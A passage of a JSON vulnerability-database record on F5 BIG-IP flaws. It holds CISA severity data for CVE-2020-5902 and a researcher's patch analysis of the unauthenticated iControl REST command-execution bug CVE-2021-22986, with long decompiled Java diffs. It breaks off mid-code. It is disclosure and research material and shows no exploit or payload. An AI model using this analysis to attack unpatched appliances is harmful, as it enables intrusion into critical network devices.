"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "F5 BIG-IP Traffic Management User Interface Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-5902", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-04-22T08:35:51", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 14, 2021 10:18am UTC reported:\n\n# CVE-2021-22986\n\n_This writeup has been updated to thoroughly reflect my findings and that of the community\u2019s. Thank you!_\n\n[This vulnerability](<https://support.f5.com/csp/article/K03009991>) appears to involve some kind of auth bypass or even SSRF, judging by my patch analysis and testing. The full-context patch below has its line numbers adjusted for use in a debugger.\n \n \n diff --git a/com/f5/rest/app/RestServerServlet.java b/com/f5/rest/app/RestServerServlet.java\n index 9cd36e1..c0c67d6 100644\n --- a/com/f5/rest/app/RestServerServlet.java\n +++ b/com/f5/rest/app/RestServerServlet.java\n @@ -1,538 +1,539 @@\n package com.f5.rest.app;\n \n import com.f5.rest.common.ByteUnit;\n import com.f5.rest.common.HttpParserHelper;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestLogger;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestOperationIdentifier;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorkerUriNotFoundException;\n import java.io.ByteArrayOutputStream;\n import java.io.IOException;\n import java.net.URI;\n import java.net.URISyntaxException;\n import java.nio.charset.StandardCharsets;\n import java.util.Enumeration;\n import java.util.HashMap;\n import java.util.Map;\n import java.util.logging.Level;\n import java.util.logging.Logger;\n import javax.servlet.AsyncContext;\n import javax.servlet.ReadListener;\n import javax.servlet.ServletException;\n import javax.servlet.ServletInputStream;\n import javax.servlet.ServletOutputStream;\n import javax.servlet.WriteListener;\n import javax.servlet.http.HttpServlet;\n import javax.servlet.http.HttpServletRequest;\n import javax.servlet.http.HttpServletResponse;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RestServerServlet\n extends HttpServlet\n {\n private static final long serialVersionUID = -6003011105634738728L;\n private static final int BUFFER_SIZE = (int)ByteUnit.KILOBYTES.toBytes(8L);\n private Logger logger = RestLogger.getLogger(RestServerServlet.class.getName());\n \n \n \n private static void failRequest(AsyncContext context, RestOperation operation, Throwable t, int httpStatusCode) {\n if (operation.generateRestErrorResponse()) {\n operation.setErrorResponseBody(t);\n }\n \n operation.setStatusCode(httpStatusCode);\n sendRestOperation(context, operation);\n }\n \n private static void sendRestOperation(AsyncContext context, RestOperation operation) {\n try {\n writeResponseHeadersFromRestOperation(operation, (HttpServletResponse)context.getResponse());\n context.getResponse().getOutputStream().setWriteListener(new WriteListenerImpl(context, operation));\n } catch (IOException e) {\n context.complete();\n }\n }\n \n \n private class ReadListenerImpl\n implements ReadListener\n {\n private AsyncContext context;\n \n private ServletInputStream inputStream;\n private RestOperation operation;\n private byte[] buffer;\n private ByteArrayOutputStream outputStream;\n \n ReadListenerImpl(AsyncContext context, ServletInputStream inputStream, RestOperation operation) {\n this.context = context;\n this.inputStream = inputStream;\n this.operation = operation;\n this.buffer = null;\n this.outputStream = null;\n }\n \n \n public void onDataAvailable() throws IOException {\n if (this.operation == null) {\n throw new IOException(\"Missing operation\");\n }\n \n if (this.outputStream == null) {\n int contentLength = (int)this.operation.getContentLength();\n if (contentLength == -1) {\n this.outputStream = new ByteArrayOutputStream();\n } else {\n this.outputStream = new ByteArrayOutputStream(contentLength);\n }\n }\n \n \n \n \n \n if (this.buffer == null)\n this.buffer = new byte[RestServerServlet.BUFFER_SIZE];\n int len;\n while (this.inputStream.isReady() && (len = this.inputStream.read(this.buffer)) != -1) {\n this.outputStream.write(this.buffer, 0, len);\n }\n }\n \n \n public void onAllDataRead() throws IOException {\n if (this.outputStream != null) {\n \n if (this.operation.getContentType() == null) {\n this.operation.setIncomingContentType(\"application/json\");\n }\n \n if (RestHelper.contentTypeUsesBinaryBody(this.operation.getContentType())) {\n byte[] binaryBody = this.outputStream.toByteArray();\n this.operation.setBinaryBody(binaryBody, this.operation.getContentType());\n } else {\n String body = this.outputStream.toString(StandardCharsets.UTF_8.name());\n this.operation.setBody(body, this.operation.getContentType());\n }\n }\n \n RestOperationIdentifier.setIdentityFromAuthenticationData(this.operation, new Runnable()\n {\n public void run()\n {\n if (!RestServer.trySendInProcess(RestServerServlet.ReadListenerImpl.this.operation)) {\n RestServerServlet.failRequest(RestServerServlet.ReadListenerImpl.this.context, RestServerServlet.ReadListenerImpl.this.operation, (Throwable)new RestWorkerUriNotFoundException(RestServerServlet.ReadListenerImpl.this.operation.getUri().toString()), 404);\n }\n }\n });\n \n \n \n RestServer.trace(this.operation);\n }\n \n \n public void onError(Throwable throwable) {\n if (this.operation != null)\n this.operation.fail(throwable);\n }\n }\n \n private static class WriteListenerImpl\n implements WriteListener\n {\n AsyncContext context;\n RestOperation operation;\n byte[] responseBody;\n ServletOutputStream outputStream;\n \n public WriteListenerImpl(AsyncContext context, RestOperation operation) {\n this.context = context;\n this.responseBody = HttpParserHelper.encodeBody(operation);\n if (this.responseBody != null) {\n context.getResponse().setContentLength(this.responseBody.length);\n }\n \n try {\n this.outputStream = context.getResponse().getOutputStream();\n } catch (IOException e) {\n onError(e);\n }\n }\n \n \n \n public void onWritePossible() throws IOException {\n while (this.outputStream.isReady()) {\n if (this.responseBody != null) {\n this.outputStream.write(this.responseBody);\n this.responseBody = null; continue;\n }\n this.context.complete();\n return;\n }\n }\n \n \n \n public void onError(Throwable throwable) {\n this.operation.fail(throwable);\n }\n }\n \n \n \n \n protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n final AsyncContext context = req.startAsync();\n \n context.start(new Runnable()\n {\n public void run() {\n RestOperation op = null;\n try {\n op = RestServerServlet.this.createRestOperationFromServletRequest((HttpServletRequest)context.getRequest());\n if (op == null) {\n HttpServletResponse errResp = (HttpServletResponse)context.getResponse();\n \n errResp.sendError(400, \"Error processing request\");\n \n context.complete();\n return;\n }\n } catch (Exception e) {\n RestServerServlet.this.logger.warning(\"cannot create RestOperation \" + e.getMessage());\n context.complete();\n \n return;\n }\n op.setCompletion(new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n RestServerServlet.sendRestOperation(context, operation);\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RestServerServlet.failRequest(context, operation, ex, operation.getStatusCode());\n }\n });\n \n try {\n ServletInputStream inputStream = context.getRequest().getInputStream();\n inputStream.setReadListener(new RestServerServlet.ReadListenerImpl(context, inputStream, op));\n } catch (IOException e) {\n RestServerServlet.failRequest(context, op, e, 500);\n }\n }\n });\n }\n \n \n \n public static String getFullURL(HttpServletRequest request) {\n StringBuilder requestURL = new StringBuilder(request.getRequestURI());\n String queryString = request.getQueryString();\n \n if (queryString == null) {\n return requestURL.toString();\n }\n return requestURL.append('?').append(queryString).toString();\n }\n \n \n private static void writeResponseHeadersFromRestOperation(RestOperation operation, HttpServletResponse response) {\n boolean traceHeaders = (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue());\n \n - if (operation.getOutgoingContentType() == null) {\n + if (operation.getOutgoingContentType() == null || operation.getStatusCode() >= 400)\n + {\n operation.defaultToContentTypeJson();\n }\n \n response.setContentType(operation.getOutgoingContentType());\n \n if (operation.getOutgoingContentEncoding() != null) {\n response.setCharacterEncoding(operation.getOutgoingContentEncoding());\n }\n \n if (operation.getAllow() != null) {\n AddResponseHeader(operation, response, \"Allow\", operation.getAllow(), traceHeaders);\n }\n if (operation.getContentRange() != null) {\n AddResponseHeader(operation, response, \"Content-Range\", operation.getContentRange(), traceHeaders);\n }\n \n if (operation.getContentDisposition() != null) {\n AddResponseHeader(operation, response, \"Content-Disposition\", operation.getContentDisposition(), traceHeaders);\n }\n \n if (operation.getWwwAuthenticate() != null) {\n AddResponseHeader(operation, response, \"WWW-Authenticate\", operation.getWwwAuthenticate(), traceHeaders);\n }\n \n if (operation.containsApiStatusInformation()) {\n AddResponseHeader(operation, response, \"X-F5-Api-Status\", HttpParserHelper.formatApiStatusHeader(operation), traceHeaders);\n }\n \n if (operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE) != null) {\n Map<String, String> headers = operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE).getHeaderMap();\n \n for (Map.Entry<String, String> header : headers.entrySet()) {\n AddResponseHeader(operation, response, header.getKey(), header.getValue(), traceHeaders);\n }\n }\n \n response.setStatus(operation.getStatusCode());\n AddResponseHeader(operation, response, \"Pragma\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-store\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"must-revalidate\", traceHeaders);\n AddResponseHeader(operation, response, \"Expires\", \"-1\", traceHeaders);\n }\n \n \n private static void AddResponseHeader(RestOperation operation, HttpServletResponse response, String headerName, String headerValue, boolean traceHeaders) {\n response.addHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n \n private static Map<String, HeaderHandler> HEADER_HANDLERS = new HashMap<>();\n static {\n HEADER_HANDLERS.put(\"Accept\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setAccept(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Authorization\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op)\n {\n String[] authHeader = headerValue.split(\" \");\n if (authHeader[0].equalsIgnoreCase(\"BASIC\")) {\n op.setBasicAuthorizationHeader(authHeader[1]);\n }\n }\n });\n HEADER_HANDLERS.put(\"Allow\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setAllow(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Transfer-Encoding\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setTransferEncoding(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Referer\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setReferer(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Forwarded-For\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXForwardedFor(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXAuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXF5AuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Connection\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n if (headerValue.equalsIgnoreCase(\"Keep-Alive\")) {\n op.setConnectionKeepAlive(true);\n op.setConnectionClose(false);\n } else if (headerValue.equalsIgnoreCase(\"Close\")) {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(true);\n } else {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(false);\n }\n }\n });\n HEADER_HANDLERS.put(\"Content-Length\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentLength(Integer.parseInt(headerValue));\n }\n });\n HEADER_HANDLERS.put(\"Content-Type\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setIncomingContentType(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Range\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentRange(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Disposition\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentDisposition(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Gossip\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setGossipHeader(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n HttpParserHelper.formatFromApiStatusHeader(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Config-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String bitMaskStr, RestOperation op) {\n try {\n long bitMask = Long.parseLong(bitMaskStr);\n op.setXF5ConfigApiStatus(bitMask);\n }\n catch (NumberFormatException ignored) {}\n }\n });\n HEADER_HANDLERS.put(\"Cookie\".toUpperCase(), new HeaderHandler()\n {\n \n \n public void processHeaderValue(String headerValue, RestOperation op)\n {\n if (headerValue.endsWith(\";\")) {\n headerValue = headerValue + \" \";\n }\n if (!headerValue.endsWith(\"; \")) {\n headerValue = headerValue + \"; \";\n }\n HttpParserHelper.parseCookieJarElements(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"WWW-Authenticate\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setWwwAuthenticate(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n }\n \n \n public static void setHostIpAddress(HttpServletRequest request, RestOperation operation) {\n if (request == null || operation == null) {\n return;\n }\n \n if (operation.getAdditionalHeader(\"X-Forwarded-Host\") == null || operation.getAdditionalHeader(\"X-Forwarded-Host\").isEmpty()) {\n \n \n String requestUrl = request.getRequestURL().toString();\n String hostIpAddress = \"localhost\";\n if (requestUrl != null && requestUrl.contains(\"://\")) {\n \n \n requestUrl = requestUrl.split(\"://\")[1];\n hostIpAddress = requestUrl.split(\"/\")[0];\n }\n operation.addAdditionalHeader(\"X-Forwarded-Host\", hostIpAddress);\n }\n }\n \n private RestOperation createRestOperationFromServletRequest(HttpServletRequest request) throws URISyntaxException {\n String port = getInitParameter(\"port\");\n String fullUrl = getFullURL(request);\n \n URI targetUri = new URI(String.format(\"%s%s:%s%s\", new Object[] { \"http://\", \"localhost\", port, fullUrl }));\n \n \n \n \n \n RestOperation op = RestOperation.create().setMethod(RestOperation.RestMethod.valueOf(request.getMethod().toUpperCase())).setUri(targetUri);\n \n \n \n Enumeration<String> headerNames = request.getHeaderNames();\n while (headerNames.hasMoreElements()) {\n String headerName = headerNames.nextElement();\n String headerValue = request.getHeader(headerName);\n if (RestOperation.isStandardHeader(headerName)) {\n if (headerValue == null) {\n this.logger.warning(headerName + \" doesn't have value, so skipping\");\n continue;\n }\n HeaderHandler headerHandler = HEADER_HANDLERS.get(headerName.toUpperCase());\n if (headerHandler != null) {\n headerHandler.processHeaderValue(headerValue, op);\n }\n continue;\n }\n op.addAdditionalHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n if (fullUrl.substring(1).startsWith(\"mgmt\")) {\n setHostIpAddress(request, op);\n }\n \n return op;\n }\n \n private static interface HeaderHandler {\n void processHeaderValue(String param1String, RestOperation param1RestOperation);\n }\n }\n diff --git a/com/f5/rest/common/RestOperation.java b/com/f5/rest/common/RestOperation.java\n index ee882d4..fc91fdd 100644\n --- a/com/f5/rest/common/RestOperation.java\n +++ b/com/f5/rest/common/RestOperation.java\n @@ -1,2875 +1,2876 @@\n package com.f5.rest.common;\n \n import com.f5.rest.workers.AuthTokenItemState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.google.gson.Gson;\n import com.google.gson.GsonBuilder;\n import com.google.gson.JsonElement;\n import com.google.gson.JsonObject;\n import com.google.gson.JsonParser;\n import com.google.gson.JsonSyntaxException;\n import java.io.Reader;\n import java.lang.reflect.Type;\n import java.net.SocketAddress;\n import java.net.URI;\n import java.nio.charset.StandardCharsets;\n import java.security.cert.Certificate;\n import java.util.ArrayList;\n import java.util.Date;\n import java.util.EnumSet;\n import java.util.HashMap;\n import java.util.HashSet;\n +import java.util.Iterator;\n import java.util.List;\n import java.util.Map;\n import java.util.Set;\n import java.util.concurrent.atomic.AtomicInteger;\n import java.util.concurrent.atomic.AtomicLong;\n import java.util.logging.Level;\n import javax.xml.bind.DatatypeConverter;\n import org.joda.time.DateTime;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RestOperation\n implements Cloneable\n {\n public static class HttpException\n extends Exception\n {\n private static final long serialVersionUID = 1L;\n \n public HttpException(String message) {\n super(message);\n }\n }\n \n private static final RestLogger LOGGER = new RestLogger(RestOperation.class, \"\");\n \n public static final int STATUS_OK = 200;\n \n public static final int STATUS_CREATED = 201;\n \n public static final int STATUS_ACCEPTED = 202;\n \n public static final int STATUS_NO_CONTENT = 204;\n \n public static final int STATUS_PARTIAL_CONTENT = 206;\n \n public static final int STATUS_FOUND = 302;\n \n public static final int STATUS_BAD_REQUEST = 400;\n public static final int STATUS_FAILURE_THRESHOLD = 400;\n public static final int STATUS_UNAUTHORIZED = 401;\n public static final int STATUS_FORBIDDEN = 403;\n public static final int STATUS_NOT_FOUND = 404;\n public static final int STATUS_METHOD_NOT_ALLOWED = 405;\n public static final int STATUS_NOT_ACCEPTABLE = 406;\n public static final int STATUS_CONFLICT = 409;\n public static final int STATUS_INTERNAL_SERVER_ERROR = 500;\n public static final int STATUS_NOT_IMPLEMENTED = 501;\n public static final int STATUS_BAD_GATEWAY = 502;\n public static final int STATUS_SERVICE_UNAVAILABLE = 503;\n public static final int STATUS_INSUFFICIENT_STORAGE = 507;\n public static final String REMOTE_SENDER_IN_PROCESS = \"InProcess\";\n public static final String REMOTE_SENDER_UNKNOWN = \"Unknown\";\n public static final String EMPTY_JSON_BODY = \"{}\";\n public static final long UNKNOWN_CONTENT_LENGTH = -1L;\n public static String WILDCARD = \"*\";\n public static String WILDCARD_PATH = \"/\" + WILDCARD;\n \n \n \n private Certificate[] serverCertificateChain;\n \n \n \n \n public static class ParsedCollectionEntry\n {\n public String collectionName;\n \n \n \n public String entryKey;\n }\n \n \n \n \n public enum RestMethod\n {\n GET, POST, PUT, DELETE, PATCH, OPTIONS;\n \n private static final String[] methodHandlerNames = new String[] { \"onGet\", \"onPost\", \"onPut\", \"onDelete\", \"onPatch\", \"onOptions\" };\n static {\n \n }\n \n public String getMethodHandlerName() {\n return methodHandlerNames[ordinal()];\n }\n }\n \n \n \n \n public enum RestOperationFlags\n {\n IDENTIFIED,\n \n VERIFIED;\n }\n \n public static boolean contentTypeEquals(String mediaTypeA, String mediaTypeB) {\n return (mediaTypeA.hashCode() == mediaTypeB.hashCode());\n }\n \n \n \n \n \n public Certificate[] getServerCertificateChain() {\n return this.serverCertificateChain;\n }\n \n RestOperation setServerCertificateChain(Certificate[] certificates) {\n this.serverCertificateChain = certificates;\n return this;\n }\n \n \n protected static final AtomicInteger maxMessageBodySize = new AtomicInteger(33554432);\n \n \n \n protected static final AtomicInteger defaultMessageBodySize = new AtomicInteger(16384);\n \n \n private static Gson gson = allocateGson(false);\n private static Gson extendedGson = allocateGson(true); public static final String HTTP_HEADER_FIELD_VALUE_SEPARATOR = \":\"; public static final String X_F5_REST_COORDINATION_ID_HEADER = \"X-F5-REST-Coordination-Id\"; public static final String X_F5_REST_COORDINATION_ID_HEADER_WITH_COLON = \"X-F5-REST-Coordination-Id:\"; public static final String X_FORWARDED_FOR_HEADER = \"X-Forwarded-For\"; public static final String X_FORWARDED_FOR_HEADER_WITH_COLON = \"X-Forwarded-For:\"; public static final String X_F5_AUTH_TOKEN_HEADER = \"X-F5-Auth-Token\"; public static final String X_F5_AUTH_TOKEN_HEADER_WITH_COLON = \"X-F5-Auth-Token:\"; public static final String X_AUTH_TOKEN_HEADER = \"X-Auth-Token\"; public static final String X_AUTH_TOKEN_HEADER_WITH_COLON = \"X-Auth-Token:\"; public static final String X_F5_GOSSIP_HEADER = \"X-F5-Gossip\"; public static final String X_F5_GOSSIP_HEADER_WITH_COLON = \"X-F5-Gossip:\"; public static final String BASIC_REALM_REST_API = \"Basic realm='REST API'\"; public static final String WWW_AUTHENTICATE_HEADER = \"WWW-Authenticate\"; public static final String WWW_AUTHENTICATE_HEADER_WITH_COLON = \"WWW-Authenticate:\";\n \n static Gson getGson() {\n return gson;\n }\n public static final String HOST_HEADER = \"Host\"; public static final String CONNECTION_HEADER = \"Connection\"; public static final String CONTENT_TYPE_HEADER = \"Content-Type\"; public static final String CONTENT_DISPOSITION_HEADER = \"Content-Disposition\"; public static final String CONTENT_LENGTH_HEADER = \"Content-Length\"; public static final String CONTENT_RANGE_HEADER = \"Content-Range\"; public static final String USER_AGENT_HEADER = \"User-Agent\"; public static final String SET_COOKIE_HEADER = \"Set-Cookie\"; public static final String DATE_HEADER = \"Date\"; public static final String SERVER_HEADER = \"Server\"; public static final String CACHE_CONTROL_HEADER = \"Cache-Control\"; public static final String PRAGMA_HEADER = \"Pragma\"; public static final String EXPIRES_HEADER = \"Expires\"; public static final String ACCEPT_HEADER = \"Accept\";\n static Gson getExtendedGson() {\n return extendedGson;\n }\n \n \n \n \n \n \n \n \n private static Gson allocateGson(boolean makeExtendedGson) {\n GsonBuilder bldr = (new GsonBuilder()).disableHtmlEscaping().setDateFormat(\"yyyy-MM-dd'T'HH:mm:ss.SSSZ\").registerTypeAdapter(DateTime.class, new DateTimeTypeAdapter());\n \n \n \n \n \n \n \n \n if (makeExtendedGson) {\n bldr.registerTypeHierarchyAdapter(RestWorkerState.class, new RestWorkerStateSerializer());\n }\n \n return bldr.create();\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static final int ACCEPT_HEADER_LENGTH = \"Accept\".length();\n \n public static final String ACCESS_CONTROL_ALLOW_HEADERS_HEADER = \"Access-Control-Allow-Headers\";\n public static final int ACCESS_CONTROL_ALLOW_HEADERS_HEADER_LENGTH = \"Access-Control-Allow-Headers\".length();\n \n public static final String ACCESS_CONTROL_ALLOW_ORIGIN_HEADER = \"Access-Control-Allow-Origin\";\n public static final int ACCESS_CONTROL_ALLOW_ORIGIN_HEADER_LENGTH = \"Access-Control-Allow-Origin\".length();\n \n public static final String ACCESS_CONTROL_MAX_AGE_HEADER = \"Access-Control-Max-Age\";\n \n public static final int ACCESS_CONTROL_MAX_AGE_HEADER_LENGTH = \"Access-Control-Max-Age\".length();\n \n public static final String ACCESS_CONTROL_ALLOW_METHODS_HEADER = \"Access-Control-Allow-Methods\";\n \n public static final int ACCESS_CONTROL_ALLOW_METHODS_HEADER_LENGTH = \"Access-Control-Allow-Methods\".length();\n \n \n public static final String ACCESS_CONTROL_ALLOW_CREDENTIALS_HEADER = \"Access-Control-Allow-Credentials\";\n \n public static final int ACCESS_CONTROL_ALLOW_CREDENTIALS_HEADER_LENGTH = \"Access-Control-Allow-Credentials\".length();\n \n \n public static final String ACCESS_CONTROL_REQUEST_HEADERS_HEADER = \"Access-Control-Request-Headers\";\n \n public static final int ACCESS_CONTROL_REQUEST_HEADERS_HEADER_LENGTH = \"Access-Control-Request-Headers\".length();\n \n public static final String AUTHORIZATION_HEADER = \"Authorization\";\n \n public static final String TRANSFER_ENCODING_HEADER = \"Transfer-Encoding\";\n \n public static final String REFERER_HEADER = \"Referer\";\n \n public static final String BASIC_AUTHORIZATION_HEADER = \"Authorization: Basic \";\n public static final String BASIC_AUTHORIZATION_HEADER_LOWERCASE = \"Authorization: Basic \".toLowerCase();\n \n public static final int BASIC_AUTHORIZATION_HEADER_LENGTH = \"Authorization: Basic \".length();\n \n public static final String COOKIE_HEADER = \"Cookie\";\n public static final int COOKIE_HEADER_LENGTH = \"Cookie\".length();\n \n public static final String COOKIE_HEADER_VALUE_SEPARATOR = \";\";\n \n public static final String TMUI_DUBBUF_HEADER = \"Tmui-Dubbuf\";\n \n public static final String ALLOW_HEADER = \"Allow\";\n \n public static final String LOCATION_HEADER = \"Location\";\n \n public static final String X_F5_API_STATUS_HEADER = \"X-F5-Api-Status\";\n \n public static final String X_F5_API_STATUS_HEADER_WITH_COLON = \"X-F5-Api-Status:\";\n \n public static final String X_F5_CONFIG_API_STATUS_HEADER = \"X-F5-Config-Api-Status\";\n \n public static final String X_F5_CONFIG_API_STATUS_HEADER_WITH_COLON = \"X-F5-Config-Api-Status:\";\n \n public static final String X_F5_NEW_AUTHTOK_REQD_HEADER = \"X-F5-New-Authtok-Reqd\";\n \n public static final String X_FORWARDED_HOST_HEADER = \"X-Forwarded-Host\";\n \n public static final String X_REAL_IP_HEADER = \"X-Real-IP\";\n private static final String[] STANDARD_HEADERS = new String[] { \"Cache-Control\", \"Pragma\", \"Expires\", \"Content-Type\", \"Content-Range\", \"Content-Disposition\", \"Content-Length\", \"Authorization\", \"X-F5-Auth-Token\", \"WWW-Authenticate\", \"X-Auth-Token\", \"X-Forwarded-For\", \"Referer\", \"X-F5-REST-Coordination-Id\", \"User-Agent\", \"Accept\", \"Connection\", \"Transfer-Encoding\", \"Host\", \"Date\", \"Server\", \"Connection\", \"Allow\", \"X-F5-Gossip\", \"X-F5-Api-Status\", \"X-F5-Config-Api-Status\" };\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n private static final HashSet<String> standardHeadersSet = getStandardHeadersSet(); public static final String CONNECTION_HEADER_VALUE_CLOSE = \"close\"; public static final String MIME_TYPE_APPLICATION_JSON = \"application/json\"; public static final String MIME_TYPE_APPLICATION_XML = \"application/xml\"; public static final String MIME_TYPE_APPLICATION_JAVASCRIPT = \"application/javascript\"; public static final String MIME_TYPE_APPLICATION_X_JAVASCRIPT = \"application/x-javascript\"; public static final String MIME_TYPE_TEXT_JAVASCRIPT = \"text/javascript\"; public static final String MIME_TYPE_TEXT_HTML = \"text/html\"; public static final String MIME_TYPE_TEXT_CSS = \"text/css\"; public static final String MIME_TYPE_TEXT_CSV = \"text/csv\"; public static final String MIME_TYPE_TEXT_XML = \"text/xml\"; public static final String MIME_TYPE_IMAGE_BMP = \"image/bmp\"; public static final String MIME_TYPE_IMAGE_GIF = \"image/gif\"; public static final String MIME_TYPE_IMAGE_JPEG = \"image/jpeg\"; public static final String MIME_TYPE_IMAGE_PNG = \"image/png\"; public static final String MIME_TYPE_IMAGE_SVG = \"image/svg+xml\"; public static final String MIME_TYPE_IMAGE_TIFF = \"image/tiff\";\n \n private static HashSet<String> getStandardHeadersSet() {\n HashSet<String> headerSet = new HashSet<>();\n for (String header : STANDARD_HEADERS) {\n headerSet.add(header.toLowerCase());\n }\n \n return headerSet;\n }\n \n \n \n \n \n \n \n \n public static boolean isStandardHeader(String header) {\n return standardHeadersSet.contains(header.toLowerCase());\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static final String MIME_ENCODING_UTF8 = StandardCharsets.UTF_8.name();\n \n public static final String MIME_TYPE_APPLICATION_OCTET_STREAM = \"application/octet-stream\";\n \n public static final String CHUNKED_TRANSFER_ENCODING = \"chunked\";\n \n public static final String PORT_SEPARATOR = \":\";\n \n public static final String PATH_SEPARATOR = \"/\";\n public static final char PATH_SEPARATOR_CHAR = '/';\n public static final String EMPTY_STRING = \"\";\n public static final char QUERY_SEPARATOR = '?';\n public static final String QUERY_SEPARATOR_STRING = Character.toString('?');\n \n \n public static final char QUERY_PARAM_SEPARATOR = '&';\n \n public static final char QUERY_EQUALS = '=';\n \n public static final String QUERY_PARAM_SEPARATOR_STRING = \"&\";\n \n public static final String GENERATION_QUERY_PARAM_NAME = \"generation\";\n \n public static final String LAST_UPDATE_MICROS_QUERY_PARAM_NAME = \"lastUpdateMicros\";\n \n static final int DEFAULT_RETRY_COUNT = 5;\n \n private RestRequestCompletion completion;\n \n \n public static 